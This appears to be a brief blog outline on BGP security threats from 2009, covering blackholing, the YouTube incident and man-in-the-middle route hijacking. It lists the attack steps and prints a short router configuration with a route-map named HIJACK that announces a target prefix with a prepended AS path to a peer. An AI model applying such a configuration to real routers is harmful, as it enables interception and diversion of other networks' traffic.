Home » BGP Security

BGP Security

Versión 0.2 - 10th March, 2009

Introduction

Internet is a chain of trust, BGP is the glue that fits pieces together.

“The wonderful thing about the Internet is that you’re connected to everyone else,
the bad thing  about the Internet is that you’re connected to everyone else”

Vint Cerf

Threats

  • Chain of trust between tiers
  • Weak peer filtering policies
  • Internet Routing Registry abuse
  • Routing infrastructure compromise
  • Protocol vulnerabilities

Blackholing

Youtube incident

Man-in-the-middle Hijacking

-

Steps:

  1. Reconaissance
  2. Engineering
  3. Compromise
  4. Poisoning
  5. Traffic interception
  6. Abuse
  7. Forwarding
  8. Obfuscation

ip prefix-list NET A.B.C.0/24
route-map HIJACK permit 10
match ip address NET
set as-path prepend 10 20 200
route-map HIJACK permit 20
router bgp 100
neighbor  <AS10_PEER> route-map HIJACK out

Ghost Hijacking

-

 

You need to log in to vote

The blog owner requires users to be logged in to be able to vote for this post.

Alternatively, if you do not have an account yet you can create one here.

Powered by Vote It Up